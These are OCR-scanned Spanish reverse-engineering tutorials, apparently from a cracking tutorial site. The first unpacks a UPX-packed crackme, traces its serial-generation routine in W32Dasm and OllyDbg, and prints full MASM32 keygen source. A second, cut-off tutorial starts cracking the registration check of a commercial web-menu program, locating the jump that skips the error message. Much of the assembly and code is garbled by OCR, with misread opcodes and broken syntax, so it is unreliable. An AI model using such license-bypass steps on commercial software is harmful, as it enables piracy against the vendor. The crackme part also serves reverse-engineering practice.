Ahora clic en el botón que dice Validar y el mensajito de error aparece... 


El Número de Serie Introducido No Es Válido 


De acuerdo vayamos a analizarlo (esto es esencial para cada archivo que vayamos a crackear, resulta que muchas veces únicamente nos vamos al W32DASM y cargamos el programa y vale, no nos dice nada y 
decimos Ooopps! | did again!) 


Para esto usaremos el PEiDentifier vO.71 Beta, lo puedes encontrar en http: //www.exetools.com, cargamos el programa y nos dice al hacer clic en el boton de Open File y seleccionar el archivo... 


UPX 0.89.6 - 1.02 / 1.05 - 1.20 (Delphi) stub -> Markus €: Lazlo 


En otras palabras empacado con UPX, bueno nos conseguimos alguna version de UPX (no se si todas lo desempacan realmente no lo he probado, yo he usado la version 1.07 y me ha desempacado casi, lease 


bien digo CASI la mayoría de archivos empacados con UPX) 


Para desempacar el programa realmente hacemos lo siguiente, en la carpeta que tenemos el programa UPX colocamos nuestro Crackme y ejecutamos desde DOS la siguiente línea... 


Al cabo de algunos segundos nos dirá que el programa está desempacado y el pequeño programa de 95KB a pasado a ser de 213KB, ahora nos vamos a cargarlo al W32DASM (tambien pueden hacerlo con DeDe, 
ya que el programa está hecho en Delphi y creanme es mucho más fácil) buscamos en las Reference Strings por la cadena "El Número de Serie...", pues que bien, no está la cadena, pero hay algunas otras que 


UPX -d keyme.exe 


me parecen interesantes por ejemplo esta... "Serial Correcto; Buen Cracker", si hacemos doble clic sobre ella llegaremos hasta aqui... 


:0042DOA5 E846CDFEFF call 00419DF0O <= Vamos a poner un punto de ruptura aquí 
:0042DOAA 8B45DC mov eax, dword ptr [ebp-24] 


:0042DOAD 8B55E8 mov edx, dword ptr [ebp-18] 


:0042D0BO E81B68FDFF call 004038DO <= Compara el Serial 
:0042D0B5 7511 ¡ne 0042D0C8 <= Si no es correcto da error 
:0042D0B7 E8B8AFFDFF call 00408074 


* Possible StringData Ref from Code Obj ->"Serial Correcto; Buen Cracker" 


:0042DOBC B83CD24200 mov eax, 0042D23C 
:0042D0C1 E806FAFFFF call 0042CACC 
:0042D0C6 EBOA jmp 0042D0D2 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0042D0B5(C) 


* Possible StringData Ref from Code Obj ->"El N" 


:0042D0C8 B864D24200 mov eax, 0042D264 
:0042DOCD E8FAF9FFFF call 0042CACC 


Pero como la idea no es encontrar el serial si no que crear un Keygen para este pequeño programa, entonces nos vamos a analizarlo con OllyDBG, vamos a cargar el programa y tambien a nuestra victima 


<= Wow! nos aparece el serial correcto en EBP-18 


<= Aquí está la cadena que buscabamos 


(ustedes ya saben File>Open, etc.etc.), pero primero un pequeño FAQ de Olly... realmente lo necesario... 


1.- ¿Colocar un punto de Ruptura? R:/ Presionar F2 sobre la línea 
2.- ¿Tracear paso a paso? R:/ Presionar F8 de línea en línea 

3.- ¿Entrar a una llamada? R:/ Con F7 o la tecla Enter 

4.- ¿Ejecutar hasta el próximo punto de Ruptura? R:/ Con F9 

5.- ¿Buscar una direccion? R:/ Presionar Ctrl+G 


Vamos a poner un punto de ruptura en 0042CE34, presionamos Ctrl+G y escribimos la direccion, presionamos Enter y caemos en la direccion, ahora presionamos F2 y ahora F9 y se ha cargado el programa, 


ingresamos nuestros valores y clic en el botón Validar, caemos en el punto de ruptura y empezamos a analizar el código de generacion del serial, lo interesante realmente comienza aqui... 


0042CE4D 
0042CE52 
0042CE55 
0042CE58 
0042CE5F 


680AD14200 
64:FF30 

64:8920 
C745F801000000 
8D45FO 


Podemos ver la palabra clave para generar el serial... 


0042CE62 
0042CE67 
0042CE6C 
0042CE6F 
0042CE72 
0042CE78 
0042CE7D 
0042CE80 
0042CE83 
0042CE89 
0042CE8E 
0042CE92 
0042CE94 


BA20D14200 
E87067FDFF 
8D55EC 
8B45F4 
8B80E0010000 
ES73CFFEFF 
8D55DC 
8B45F4 
8B80E0010000 
E862CFFEFF 
837DDC00 
7417 

8D55D8 


MOV EDX,KEYME.0042D120 

CALL KEYME.004035DC 

LEA EDX,DWORD PTR SS:[EBP-14] 
MOV EAX,DWORD PTR SS:[EBP-C] 
MOV EAX,DWORD PTR DS:[EAX+1E0] 
CALL KEYME.00419DFO 

LEA EDX,DWORD PTR SS:[EBP-24] 
MOV EAX,DWORD PTR SS:[EBP-C] 
MOV EAX,DWORD PTR DS:[EAX+1E0] 
CALL KEYME.00419DFO 

CMP DWORD PTR SS:[EBP-24],0 

JE SHORT KEYME.0042CEAB 

LEA EDX,DWORD PTR SS:[EBP-28] 


PUSH KEYME.0042D10A 

PUSH DWORD PTR FS:[EAX] 

MOV DWORD PTR FS:[EAX],ESP 
MOV DWORD PTR SS:[EBP-8],1 
LEA EAX,DWORD PTR SS:[EBP-10] 


; ASCII 4D,"UYBIENHASDESCUBIERTOLACONSTANTEPEROTODAVIATEQUEDAPORHACERTOMANUMERITO78943789" 


0042CE97  8B45F4 MOV EAX,DWORD PTR SS:[EBP-C] 
0042CE9A 8B80F0010000 MOV EAX,DWORD PTR DS:[EAX+1FO0] 


0042CEAO0 E84BCFFEFF CALL KEYME.00419DFO 

0042CEA5 837DD800 CMP DWORD PTR SS: [EBP-28],0 

0042CEA9 750F JNZ SHORT KEYME.0042CEBA 

Si en alguna casilla no se han introducido datos da este mensaje... 

0042CEAB B8FCD14200 MOV EAX, KEYME.0042D1FC ; ASCII "Alguna de Las Casillas No Ha Sido Rellenada" 
0042CEBO E817FCFFFF CALL KEYME.0042CACC 

0042CEB5 E918020000 J MP KEYME.0042D0D2 

0042CEBA 8B45EC MOV EAX,DWORD PTR SS:[EBP-14] 
0042CEBD E8C26AFDFF CALL KEYME.00403984 

0042CEC2 EBA998FDFF CALL KEYME.00406770 

0042CEC7 8BF8 MOV EDI,EAX 

0042CEC9 85FF TEST EDI,EDI 

0042CECB 7E4F JLE SHORT KEYME.0042CF1C 


En esta parte el programa empieza buscando desde la primera letra de nuestro nombre hasta la última, si la letra no se encuentra dentro de la palabra clave el programa la elimina de una tercera palabra que 
formará compuesta por los caracteres de nuestro nombre que aparecen en la cadena clave y valga la redundancia nuestro nombre, por ejemplo las letras "k", "g" y "G" son eliminadas por que no se encuentran en 
la palabra clave. 


0042CECD BE01000000 MOV ESI,1 

0042CED2 8B45FO MOV EAX,DWORD PTR SS:[EBP-10] 
0042CED5 EBAAGAFDFF CALL KEYME.00403984 

0042CEDA E89198FDFF CALL KEYME.00406770 

0042CEDF 85C0 TEST EAX,EAX 

0042CEE1 7E35 JLE SHORT KEYME.0042CF18 
0042CEE3 BB01000000 MOV EBX,1 

0042CEE8 8B55EC MOV EDX,DWORD PTR SS:[EBP-14] 
0042CEEB 8A5432FF MOV DL,BYTE PTR DS:[EDX+ESI-1] 
0042CEEF 8B4DFO MOV ECX,DWORD PTR SS:[EBP-10] 
0042CEF2 3A5419FF CMP DL,BYTE PTR DS:[ECX+EBX-1] 
0042CEF6 751€ JNZ SHORT KEYME.0042CF14 
0042CEF8 8D45D4 LEA EAX,DWORD PTR SS:[EBP-2C] 
0042CEFB 8B55EC MOV EDX,DWORD PTR SS:[EBP-14] 
0042CEFE 8A5432FF MOV DL,BYTE PTR DS:[EDX+ESI-1] 
0042CF02 E8E167FDFF CALL KEYME.004036E8 

0042CF07 8B55D4 MOV EDX,DWORD PTR SS:[EBP-2C] 
0042CFOA 8D45E8 LEA EAX,DWORD PTR SS:[EBP-18] 
0042CFOD E8B668FDFF CALL KEYME.004037C8 

0042CF12 EBO4 JMP SHORT KEYME.0042CF18 
0042CF14 43 INC EBX 

0042CF15 48 DEC EAX 

0042CF16 DO JNZ SHORT KEYME.0042CEE8 
0042CF18 46 INC ESI 

0042CF19 AF DEC EDI 

0042CF1A B6 JNZ SHORT KEYME.0042CED2 

Aqui termina la creación de la tercera cadena... y empieza la extración de los primeros seis caracteres de la cadena 
0042CF1C 8D45E8 LEA EAX,DWORD PTR SS:[EBP-18] 
0042CF1F 8B55FO MOV EDX,DWORD PTR SS:[EBP-10] 
0042CF22 E8A168FDFF CALL KEYME.004037C8 

0042CF27 8D45EC LEA EAX,DWORD PTR SS:[EBP-14] 
0042CF2A E81566FDFF CALL KEYME.00403544 

0042CF2F BB01000000 MOV EBX, 1 

0042CF34 8D45E4 LEA EAX,DWORD PTR SS:[EBP-1C] 
0042CF37 8B55E8 MOV EDX,DWORD PTR SS:[EBP-18] 
0042CF3A 8A541AFF MOV DL,BYTE PTR DS:[EDX+EBX-1] 


0042CF3E ESA567FDFF CALL KEYME.004036E8 


0042CF43 8D45EC LEA EAX,DWORD PTR SS:[EBP-14] 


0042CF46 8B55E4 MOV EDX,DWORD PTR SS:[EBP-1C] 
0042CF49 ES7A68FDFF CALL KEYME.004037C8 

0042CF4E 43 INC EBX 

0042CF4F 83FB07 CMP EBX,7 

0042CF52 EO JNZ SHORT KEYME.0042CF34 


Ya han sido extraídos los primeros seis caracteres de la cadena y ahora el programa va a buscar de acuerdo a los seis caracteres extraídos una unión de caracteres más haciendo algunas operaciones... 
0042CF54 8B45EC MOV EAX,DWORD PTR SS:[EBP-14] 

0042CF57 E8286AFDFF CALL KEYME.00403984 

0042CF5C ESOF98FDFF CALL KEYME.00406770 


0042CF61 8BF8 MOV EDI,EAX 

0042CF63 85FF TEST EDI,EDI 

0042CF65 7E6C JLE SHORT KEYME.0042CFD3 
0042CF67 BBO01000000 MOV EBX, 1 

0042CF6C 8B45FO MOV EAX,DWORD PTR SS:[EBP-10] 


0042CF6F ES106AFDFF CALL KEYME.00403984 
0042CF74 ESF797FDFF CALL KEYME.00406770 


0042CF79 85C0 TEST EAX,EAX 

0042CF7B 7E52 JLE SHORT KEYME.0042CFCF 

0042CF7D BE01000000 MOV ESI,1 <= ESI recibe el valor 1 

0042CF82 8B55EC MOV EDX,DWORD PTR SS:[EBP-14] <= EDX recibe los seis caracteres 
0042CF85 8A541AFF MOV DL,BYTE PTR DS:[EDX+EBX-1] <= Extrae caracter por caracter 
0042CF89 8B4DFO MOV ECX,DWORD PTR SS:[EBP-10] <= ECX recibe la palabra clave 
0042CF8C 3A5431FF CMP DL,BYTE PTR DS:[ECX+ESI-1] <= Compara los caracteres 
0042CF90 7539 JNZ SHORT KEYME.0042CFCB <= Si no son iguales continua buscando 
0042CF92 8BCE MOV ECX,ESI <= ESI es el valor de la posicion en que fue hallado el caracter 
0042CF94 8BC1 MOV EAX, ECX 

0042CF96 F7E9 IMUL ECX <= EAX = EAX * ECX 

0042CF98 8BC8 MOV ECX,EAX 

0042CF9A 2BCE SUB ECX,ESI <= ECX = ECX - ESI 

0042CF9C 034DEO ADD ECX,DWORD PTR SS:[EBP-20] <= Suma el valor de EBP-20 
0042CF9F 8BC1 MOV EAX, ECX 

0042CFA1 B936000000 MOV ECX,36 

0042CFA6 99 CDQ 

0042CFA7 F7F9 IDIV ECX <= El cociente de dividir ECX dentro de EAX es almacenado en EDX 
0042CFA9 8BF2 MOV ESI,EDX <= ESI recibe el valor 

0042CFAB 46 INC ESI <= Incrementa uno 

0042CFAC 8D45D4 LEA EAX, DWORD PTR SS: [EBP-2C] 

0042CFAF 8B55FO MOV EDX,DWORD PTR SS:[EBP-10] <= EDX recibe palabra clave 


0042CFB2 8A5432FF MOV DL,BYTE PTR DS:[EDX+ESI-1] <= Extrae el caracter de la posicion que indique ESI-1 
0042CFB6 E82D67FDFF CALL KEYME.004036E8 

0042CFBB 8B55D4 MOV EDX,DWORD PTR SS:[EBP-2C] 

0042CFBE 8D45FC LEA EAX,DWORD PTR SS:[EBP-4] 

0042CFC1 E80268FDFF CALL KEYME.004037C8 


0042CFC6 8975E0 MOV DWORD PTR SS:[EBP-20],ESI 

0042CFC9 EBO4 JMP SHORT KEYME.0042CFCF 

0042CFCB 46 INC ESI 

0042CFCC 48 DEC EAX 

0042CFCD B3 JNZ SHORT KEYME.0042CF82 

0042CFCF 43 INC EBX 

0042CFDO 4F DEC EDI 

0042CFD1 99 JNZ SHORT KEYME.0042CF6C <= Si no ha terminado la cadena regresa a 0042CF6C 
0042CFD3 8D45E8 LEA EAX,DWORD PTR SS:[EBP-18] 


0042CFD6 E86965FDFF CALL KEYME.00403544 
0042CFDB BB01000000 MOV EBX, 1 


0042CFEO 83FB07 
0042CFE3 750D JNZ SHORT KEYME.0042CFF2 
0042CFE5 8D45E8 LEA EAX,DWORD PTR SS:[EBP-18] 
0042CFE8 BA30D24200 MOV EDX,KEYME.0042D230 
0042CFED E8D667FDFF CALL KEYME.004037C8 

0042CFF2 8D45D4 LEA EAX,DWORD PTR SS:[EBP-2C] 
0042CFF5 8B55FC MOV EDX,DWORD PTR SS:[EBP-4] 
0042CFF8 8A541AFF MOV DL,BYTE PTR DS:[EDX+EBX-1] 
0042CFFC ESE766FDFF CALL KEYME.004036E8 

0042D001 8B55D4 MOV EDX,DWORD PTR SS:[EBP-2C] 
0042D004 8D45E8 LEA EAX,DWORD PTR SS:[EBP-18] 
0042D007 E8BC67FDFF CALL KEYME.004037C8 

0042D00C 43 INC EBX 

0042D00D 83FB07 CMP EBX,7 

0042D010 CE JNZ SHORT KEYME.0042CFEO 
Ahora el programa extraerá letra por letra para formar un valor... 


CMP EBX,7 


<= EDX recibe la cadena formada anteriormente (Está compuesta de 6 caracteres, no debe confudirse con la primera de 6 caracteres) 


0042D012 8B45EC MOV EAX,DWORD PTR SS:[EBP-14] <= EAX recibe la primer cadena de 6 caracteres 

0042D015 E86A69FDFF CALL KEYME.00403984 

0042D01A  E85197FDFF CALL KEYME.00406770 

0042D01F 8BF8 MOV EDI,EAX 

0042D021 85FF TEST EDI,EDI 

0042D023 7E14 JLE SHORT KEYME.0042D039 

0042D025 BB01000000 MOV EBX,1 <= EBX recibe el valor de 1 

0042D02A 8B45EC MOV EAX,DWORD PTR SS:[EBP-14] <= EAX recibe el valor de la primera cadena de 6 caracteres 

0042D02D 0FB67418FF MOVZX ESI,BYTE PTR DS:[EAX+EBX-1] <= Extrae caracter por caracter 

0042D032 0175F8 ADD DWORD PTR SS:[EBP-8],ES!I <= Suma el valor decimal del caracter a EBP-8 que tiene como valor inicial 1 
0042D035 43 INC EBX <= Incrementa EBX 

0042D036 — 4F DEC EDI <= Decrece EDI 

0042D037 Fl JNZ SHORT KEYME.0042D02A <= Vamos el segundo,tercero,cuarto,etc... 

0042D039 6945F87B2B0100 IMUL EAX,DWORD PTR SS:[EBP-8],12B7B_ <= EAX = EBP-8 * 12B7B 

0042D040 8945F8 MOV DWORD PTR SS:[EBP-8],EAX <= EAX tiene el valor en Hexa de el primer valor que compone el serial correcto 
0042D043 8D55FC LEA EDX, DWORD PTR SS:[EBP-4] 

0042D046 8B45F8 MOV EAX,DWORD PTR SS:[EBP-8] 

0042D049 ES0OA95FDFF CALL KEYME.00406558 <= El valor de EAX es trasladado a Decimal 

0042D04E FF75FC PUSH DWORD PTR SS: [EBP-4] 

0042D051 6830D24200 PUSH KEYME.0042D230 

0042D056 FF75E8 PUSH DWORD PTR SS:[EBP-18] 

0042D059 8D45E8 LEA EAX,DWORD PTR SS:[EBP-18] 

0042D05C  BA03000000 MOV EDX,3 <= EDX recibe el valor de 3 

0042D061 E81A68FDFF CALL KEYME.00403880 <= Concatena los valores el que se acaba de cambiar a decimal y la segunda cadena de caracteres 
0042D066 8945FC MOV DWORD PTR SS:[EBP-4],EAX <= EAX traslada el valor 0042D066 a EBP-4 


Ahora formamos un tercer valor para formar ya en sí lo que es el serial, el cual al final nos quedaría así... 


NNNNNNNN-CCCCCC-NNNNNN 


A la vista de no hacer de este tutorial un crack rápido, lo que sigue ya les toca a ustedes, si ya sé, este es un crackme, pero esto que significa, significa el que ustedes realmente se quiebren la cabeza, para 
destriparlo, además para los que conocen assembler este arroz ya se coció... 


0042D069 — F765F8 MUL DWORD PTR SS:[EBP-8] 
0042D06C  F765F8 MUL DWORD PTR SS:[EBP-8] 
0042D06F  8955F8 MOV DWORD PTR SS: [EBP-8],EDX 
0042D072  C16DF805 SHR DWORD PTR SS:[EBP-8],5 
0042D076 — FF75E8 PUSH DWORD PTR SS:[EBP-18] 
0042D079 —6830D24200 PUSH KEYME.0042D230 
0042D07E  8D55D4 LEA EDX,DWORD PTR SS:[EBP-2C] 
0042D081  8B45F8 MOV EAX,DWORD PTR SS:[EBP-8] 


0042D084 E8CF94FDFF CALL KEYME.00406558 <= Convierte nuestro ultimo valor en Decimal 


0042D089 — FF75D4 PUSH DWORD PTR SS:[EBP-2C] 

0042D08C  8D45E8 LEA EAX,DWORD PTR SS:[EBP-18] 

0042D08F BA03000000 MOV EDX,3 

0042D094 E8E767FDFF CALL KEYME.00403880 <= Une todos los valores creando nuestro serial correcto 
0042D099  8D55DC LEA EDX,DWORD PTR SS:[EBP-24] 

0042D09C  8B45F4 MOV EAX,DWORD PTR SS:[EBP-C] 

0042D09F  8B80F0010000 MOV EAX,DWORD PTR DS:[EAX+1F0] 

0042DOA5  E846CDFEFF CALL KEYME.00419DFO 

0042DOAA  8B45DC MOV EAX,DWORD PTR SS:[EBP-24] <= EAX recibe nuestro serial malo 

0042DOAD  8B55E8 MOV EDX,DWORD PTR SS:[EBP-18] <= EDX recibe el serial correcto 

0042D0B0  E81B68FDFF CALL KEYME.004038DO <= Compara EAX y EDX 

0042D0B5 7511 JNZ SHORT KEYME.0042D0C8 <= Si son iguales no vamos a ver el mensaje de error, sino que continuamos al de "Buen Cracker" 
0042D0B7  E8B8AFFDFF CALL KEYME.00408074 

0042D0OBC  B83CD24200 MOV EAX,KEYME.0042D23C  ; ASCII "Serial Correcto; Buen Cracker" 


Ahora ya podemos generar el keygen y aqui tienen el código fuente en MASM32... 


.386 
.model flat, stdcall 
option casemap: none 


include c:1masm321includelwindows.inc 
include c:1masm321includeluser32.inc 
include c:1masm321includelkernel32.inc 
includelib c:1masm321libluser32. lib 
includelib c:1masm321liblkernel32.!ib 


.const 


IDD_DIALOG EQU 100 
IDC_NAME EQU 101 
IDC_SERIAL EQU 102 
IDI_ICON EQU 103 
I1DC_COPY EQU 200 
IDC_INFO EQU 201 


DigFunc PROTO : DWORD,: DWORD,: DWORD,: DWORD 
Operacion PROTO 
Clipo PROTO hWnd: HWND 


.data 


nombre db 33 dup(0),0 

blank db 10 dup(0),0 

clave db 

"MUYBIENHASDESCUBIERTOLACONSTANTEPEROTODAVIATEQUEDAPORHACERTOMANUMERITO7894378924978yparacomplicarmasminusculastambienYMASCOSASZXCVBNMÑA345" 
db "nu 


db "+SA" 
db "nu 
db "+C-*/()868% % $$:" 
do" 


db "1![1;: -DSHFSDKJFSOIU440KF] DBKSDKSFDSOIFE8983493KFLJ] NV",O 
serial db "0123456789",0 
seriall db 40 dup(0),0 
serial2 db "0123456789",0 
cadena db 33 dup(0),0 
separa db "-",0 
mifmt db "%lu",0 
minombre db "ByTESCRK",0 
aboutcap db "Crack-KeyGen-ME v1.0",0 
abouttxt db "Keygen por ByTESCRK",13,10 
db "bytescrk",13,10,13,10 
db "Cracked [RAZIEL] :)",13,10,13,10 


db "http: //granavenida.com/kfor",0 
minchar db "¡Mínimo 1 caracter!",O 
hInstance dd O 
hIcon dd O 
buff db 256 dup(?) 
hWnd HWND ? 


.code 
start: 


invoke GetModuleHandle, NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance,IDD_DIALOG,NULL,addr DlgFunc, NULL 
invoke ExitProcess, NULL 


DigFunc proc hDlg: DWORD,uMsg: DWORD, wParam: DWORD,IParam: DWORD 


.1fuMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWnd,eax 
invoke Loadl con,hInstance,!|DI_ICON 
mov h|con,eax 
invoke SendMessage, hDlg, WM_SETICON,1,hlcon 
invoke SendDIgltemMessageA,hWnd,|DC_NAME,EM_LIMITTEXT, 32, NULL 
invoke SetWindowText,hDlg, ADDR aboutcap 
invoke SetDlgltemText,hDlg,I|DC_ NAME, ADDR minombre 
.elseif uMsg==WM_CLOSE 
invoke EndDialog,hDlg, NULL 
.elseif uMsg==WM_COMMAND 
mov eax,wParam 
.Hfax==|DC_NAME 
shr eax,16 
.ifax==EN_CHANGE 
invoke GetDlgltemTextA,hDlg,I|DC_NAME,ADDR nombre, 33 
invoke Istrlen, ADDR nombre 
.lfeax== 
invoke SetDlgltemTextA, hDlg,I|DC_SERIAL,ADDR blank 
.else 
invoke Operacion 
.lfeax== 
invoke SetDlgltemTextA, hDlg,I|DC_SERIAL,ADDR minchar 
.elseif eax==6666 
invoke SetDlgltemText,hDlg,I|DC_NAME,ADDR nombre 
.else 
invoke SetDlgltemTextA, hDlg,|DC_SERIAL,ADDR serial 
.endif 
.endif 
xor eax, eax 
ret 
.endif 
.endif 
mov edx,eax 
shr edx,16 
.Hf dx==BN_CLICKED 
.Hfax==]DC_COPY 
invoke Clipo,hDlg 
xor eax,eax 
ret 
.elseif ax==IDC_INFO 
invoke MessageBoxaA, hDlg, offset abouttxt, offset aboutcap, NULL 
xor eax,eax 
ret 
.endif 
.endif 
.endif 
xor eax,eax 


ret 

DigFunc endp 
Operacion proc 
pushad 


invoke Istrlen, offset nombre 
.¡feax<0 

popad 

mov eax,1 

ret 
.endif 


mov esi, offset serial 

mov dword ptr[esi],33323130h 
add esi,4 

mov dword ptr[esil,37363534h 
add esi,4 

mov dword ptr[esil,3938h 


mov esi, offset serial2 

mov dword ptr[esi],33323130h 
add esi,4 

mov dword ptr[esil,37363534h 
add esi,4 

mov dword ptr[esi],3938h 


mov edx, offset clave 

mov ebx,1 

mov edi, 1 

invoke Istrlen, offset nombre 
push ebp 

mov ebp,eax 


Stepo: mov esi, offset nombre 
movsx eax,byte ptr[esi+ebx-1] 
StepN: movsx ecx, byte ptr[edx+edi-1] 
$ eax==ecx 
mov ecx, offset cadena 
mov esi,eax 
invoke Istrlen, ecx 
feax>0 
add ecx,eax 
.endif 
mov dword ptr[ecx], esi 
.else 
inc edi 
cmp edi,000000d4h 
jne StepN 
.endif 
mov edi, 1 
inc ebx 
invoke Istrlen, offset nombre 
inc eax 
cmp ebx,eax 
jne StepO 


invoke Istrlen, offset cadena 
Ifeax>6 
jmp siga 
.endif 
mov edi, 1 
mov esi, offset cadena 


fill: mov ecx, offset clave 
movsx ebx, byte ptr[ecx+edi-1] 


invoke Istrlen, esi 
feax>0 

add esi,eax 
.endif 
mov dword ptr [esi],ebx 
invoke Istrlen, offset cadena 
Ifeax<6 

inc edi 

jmp fill 
.endif 


siga: 
pop ebp 
xor esi, esi 
mov dword ptr[EBP-020h], esi 
mov ebx, offset cadena 
mov esi,1 

Step1: 
mov edx, offset clave 
mov al,byte ptr[ebx] 
cmp al, byte ptr[edx+esi-1] 
jne EndA 


MOV ECX,ESI 
MOV EAX,ECX 
IMUL ECX 
MOV ECX,EAX 
SUB ECX,ESI 
ADD ECX,DWORD PTR [EBP-020h] 
MOV EAX,ECX 
MOV ECX,000000036h 
CDQ 
IDIV ECX 
MOV ESI,EDX 
INC ESI 
INC EBX 
MOV EDX, offset clave 
MOV DWORD PTR [EBP-020h],ESI 
MOVSX ECX,BYTE PTR[EDX+ESI!-1] 
mov esi, offset serial1 
invoke Istrlen, esi 
feax>0 
add esi,eax 
.endif 
feax == 6 
MOV EBX,1 
MOV DWORD PTR[EBP-8],EBX 
jmp Step2 
.endif 
mov dword ptr[esi],ecx 
MOV ESI,1 
JMP Step1 
Enda: 
INC ESI 
jmp Step1 


Step2: MOV EAX, offset cadena 
MOVZX ESI,BYTE PTR DS:[EAX+EBX-1] 
ADD DWORD PTR [EBP-8],ESI 
INC EBX 
cmp ebx,7 
JNE Step2 
IMUL EAX,DWORD PTR [EBP-8],12B7Bh 
mov esi, offset serial 
invoke wsprintfA,esi,ADDR mifmt,eax 
MOV EBX,1 
MOV DWORD PTR[EBP-8],EBX 


Step3: MOV EAX, offset cadena 
MOVZX ESI,BYTE PTR DS:[EAX+EBX-1] 
ADD DWORD PTR [EBP-8],ESI 
INC EBX 
cmp ebx,7 
JNE Step3 
IMUL EAX,DWORD PTR [EBP-8],12B7Bh 
XOR ECX,ECX 
MOV DWORD PTR [EBP-8],EAX 
MOV EAX,42D066h 
MOV EDX, 3 
MUL DWORD PTR [EBP-8] 
MUL DWORD PTR [EBP-8] 
MOV DWORD PTR [EBP-8],EDX 
SHR DWORD PTR [EBP-81,5 
mov eax, dword ptr [EBP- 8] 
mov esi, offset serial2 
invoke wsprintfA,esi,ADDR mifmt,eax 


invoke Istrcat, offset serial, offset separa 
invoke Istrcat, offset seriall, offset separa 
invoke Istrcat, offset seriall, offset serial2 
invoke Istrcat, offset serial, offset seriall 


popad 
ret 


Operacion endp 


Clipo proc hDlg: DWORD 
LOCAL gmem : DWORD 


invoke GlobalAlloc, GMEM_ MOVEABLE+GMEM_DDESHARE, 254 
mov gmem,eax 


invoke GlobalLock,eax 
cmp eax, NULL 

je noabra 

mov ebx, offset serial 
lea esi,dword ptr[ebx] 
mov edi, eax 

mov ecx,29 


rep movsb 


invoke OpenClipboard, hDlg 
cmp eax, TRUE 
jne noabra2 


mov eax,gmem 
invoke SetClipboardData, CF_TEXT, eax 


invoke CloseClipboard 


noabra2: 
mov eax,gmem 
invoke GlobalFree, eax 


noabra: 
ret 
Clipo endp 


end start 
ao... Final de Código----- 


Y Crack-KeyGen-MEw1.0 


Nombre: 
ByTESCRK 


Serial: 
[37643497-STAHTB-71 1881 


Copiar 


"EL motivo de este tutorial es solo con el fin de conocer la seguridad en ciertos programas de manera educacional y tambien como diversión, aunque como RAZIiEL nos dice que podemos 
hacer y deshacer con el programa, realmente yo tambien los invito a hacerlo ;o)" 


Y así doy por concluído mi 15avo tutorial, saludando a mis buenos amigos Karpoff, PrOfesor_X, CaoS ReptantE, [Kalisto (okaruzic) "Salute"] y a todos los crackers hispanohablantes. 
Si tienes alguna duda o comentario escríbeme a: ByTESCRKGOiespana.es 


ByTESCRK 


Karpoff Spanish Tutor: 


Pagina dedicada a la divulgacion de informacion en Castellano, 


sobre 
Ingenieria Inversa y Programacion. 


Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 


AllWebMenus v 1.3 Build ¿354 


Programa: 


PROTECCION: Unlock Code 


Descripcion: Crea menus flotantes taco de chulos para páginas web 
Dificultad: Facililla 

DOWNLOAD : http: //www.alwebmenus.com 

Herramientas: Softice, W32dasm, Hex Workshop, RegMon, Topo. 


CRACKER: AuspeX FECHA: 01/03/2002 


| INTRODUCCION 


Este soft digamos que fue el que, en cierto modo, me inicio en este mundo del cracking, pero es una historia muy 
larga para explicarla ahora. El programa que vamos a tratar esta escrito en lenguaje Visual Basic 6 y utiliza la 
librería MSVBVM60.DLL con los problemas que llevan estos programas para encontrar el código correcto mediante 
traceo (lo digo por experiencia con otros programas escritos en dicho lenguaje), aunque, algunas veces, son incluso 
más faciles de crackear de lo que parecen. Nos vamos a ayudar de las funciones que utiliza dicha librería para 
encontrar el code correcto. 


| AL ATAKE 


Abrimos el programa, lo ejecutamos. Le echamos un vistazo, y nos vamos directamente al menú de Help para ver que es lo 
que tenemos ahí. Podemos observar la opción Register AllVVebMenus. Pues nada, picamos e intentamos registramos 
metiéndole cualquier chorrada que se nos ocurra, ¿me apuesto 1000 duros a que no acertais a la primera? (si por casualidad 
alguien acertó de primera, retiro la apuesta, xD). 


Failed to register 


[X 


Bueno, pues ante esto, lo primero que a mi se me ocurrió (por que soy muy flojo) fue abrir el W32Dasm y mirar a ver si por 
casualidad encontraba la referencia a esta cadena, y de hecho tuve suerte y la encontré cuando desensamblé el ejecutable 
del programa. Os pondré el código más o menos resumido (lo más importante) de lo que me fui encontrando en los 

alrededores de la referencia: 


:005474CE FF154C104000 Call dword ptr [0040104C] 
:005474D4 83C418 add esp, 00000018 
:005474D7 663BF3 cmp si, bx 


:005474DA 0F8486000000 je 00547566 < 
chico malo que está aquí, mas abajo. 


Ahora veremos que nos manda a la zona de chico bueno saltandose la zona de 


* Reference To: MSVBVM60,  vbaVarDup, Ord:0000h 


:005474E0 8B3570124000 mov esi, dword ptr [00401270] 
:005474E6 B904000280 mov ecx, 80020004 
:005474EB 894D9C mov dword ptr [ebp-64], ecx 


* Possible StringData Ref from Code Obj ->"Failed to register" < 


titulo de la ventana de error 


:0054750A C7857CFFFFFFBCFE4100 mov dword ptr [ebp+FFFFFF7C], 0041FEBC 


:00547514 899D74FFFFFF mov dword ptr [ebp+FFFFFF74], ebx 
:00547514A FFD6 call esi 


:0054751C 8D5584 lea edx, dword ptr [ebp-7C] 
:0054751F 8D4DC4 lea ecx, dword ptr [ebp-3C] 


* Possible StringData Ref from Code Obj ->"The password you entered is not " <-----nuestro mensaje de error 
->"correct" 


:00547522 C7458CE8FE4100 mov [ebp-74], 0041FEES 


:00547529 895D84 mov dword ptr [ebp-7C], ebx 
:0054752C FFDE call esi 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:005474DA(C) 


:00547566 391D785D5500 cmp dword ptr [00555D78], ebx <-----Comienza la supuesta zona de chico bueno 
:0054756C 7510 jne 0054757E 

:0054756E 68785D5500 push 00555D78 

:00547573 68784E4100 push 00414E78 


* Possible StringData Ref from Code Obj ->"pwd" <-----luego veremos que es esto 


:00547609 68C84E4100 push 00414EC8 


* Possible StringData Ref from Code Obj ->"Settings" 


:0054760E 689C4E4100 push 00414FE9C 
:00547613 52 push edx 


* Possible StringData Ref from Code Obj ->"Registration Completed" <----- ¡ Chico buenooooo ! 


| 

:00547667 C7857CFFFFFF90FF4100 mov dword ptr [ebp+FFFFFF7C], 0041FF90 
:00547671 899D74FFFFFF mov dword ptr [ebp+FFFFFF74], ebx 

:00547677 FFD6 call esi 

:00547679 8D5584 lea edx, dword ptr [ebp-7C] 

:0054767C 8D4DC4 lea ecx, dword ptr [ebp-3C] 


* Possible StringData Ref from Code Obj ->"Thank you for registering AllWebMenus!" <-----gracias tio, ajaja 
| 


